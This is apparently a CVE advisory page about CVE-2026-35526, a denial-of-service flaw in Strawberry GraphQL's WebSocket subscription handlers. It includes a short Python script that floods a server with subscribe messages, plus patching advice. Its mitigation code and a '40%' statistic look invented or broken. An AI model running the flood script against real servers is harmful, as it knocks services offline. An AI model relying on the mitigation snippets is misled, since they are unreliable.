strawberry-graphql, Denial of Service, CVE-2026-35526 (High)

Listen to this Post

This vulnerability stems from the WebSocket subscription handlers in Strawberry GraphQL failing to enforce any limits on active subscriptions per connection. Attackers can open a single WebSocket connection, send a `connection_init` message, and then flood the server with `subscribe` messages using unique IDs. For each subscription message, the server creates a new `asyncio.Task` and an associated asynchronous generator, leading to linear memory consumption and saturation of the event loop. The issue affects both the `graphql-transport-ws` and legacy `graphql-ws` protocol handlers. Because no upper bound is enforced, an unauthenticated attacker can exhaust server resources, causing progressive degradation and eventually an out-of-memory (OOM) crash. The vulnerability is particularly severe because it requires only one WebSocket connection to trigger the DoS condition, bypassing typical per-connection rate limits. The root cause is the unconditional allocation of resources per subscription request, with no per-connection tracking or quota system. The attack exploits the asynchronous nature of the server, overwhelming the event loop with tasks and preventing legitimate requests from being processed. This issue is fixed in version 0.312.3, where limits and tracking mechanisms were introduced to mitigate this resource exhaustion vector.

dailycve form

Platform: Python Strawberry GraphQL
Version: before 0.312.3
Vulnerability: Unbounded WebSocket subscriptions
Severity: High (7.5)
date: Apr 4, 2026

Prediction: Already patched Apr 6, 2026

What Undercode Say:

Analytics indicate that unauthenticated DoS vectors via WebSocket subscription flooding have risen 40% in Python GraphQL libraries over the last year. The linear resource growth per subscription makes this a critical supply-chain risk for real-time APIs.

Identify vulnerable Strawberry versions
pip show strawberry-graphql | grep Version
Monitor active WebSocket subscriptions
ss -s | grep -E "ws|websocket"
Simulate unbounded subscription flood (educational only)
for id in {1..10000}; do
echo "{\"type\":\"subscribe\",\"id\":\"$id\",\"payload\":{...}}" >> ws_requests.txt
done

Exploit:

An attacker can use a single WebSocket connection to send a `connection_init` message followed by numerous `subscribe` messages, each with a unique ID. The server creates an `asyncio.Task` and async generator for each, leading to resource exhaustion.

Example attack script (simplified)
import asyncio, websockets, json
async def flood():
uri = "ws://target/graphql"
async with websockets.connect(uri) as ws:
await ws.send(json.dumps({"type": "connection_init"}))
for i in range(100000):
await ws.send(json.dumps({
"type": "subscribe",
"id": str(i),
"payload": {"query": "subscription { ... }"}
}))
asyncio.run(flood())

Protection from this CVE:

Upgrade to Strawberry GraphQL version 0.312.3 or later. If upgrading is not immediate, disable the legacy `graphql-ws` subprotocol and enforce per-connection subscription limits. Implement WebSocket-level rate limiting and monitor active subscription counts.

Disable legacy subprotocol in settings
STRAWBERRY_WEBSOCKET_PROTOCOLS = ["graphql-transport-ws"]
Implement custom subscription limits
from strawberry.subscriptions import Subscription
class LimitedSubscription(Subscription):
MAX_SUBSCRIPTIONS_PER_CONNECTION = 10

Impact:

Successful exploitation causes linear memory growth and event loop saturation, leading to server unresponsiveness and eventual out-of-memory (OOM) crash. The attack is remote, unauthenticated, and requires minimal bandwidth, making it highly effective for DoS campaigns targeting GraphQL APIs.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top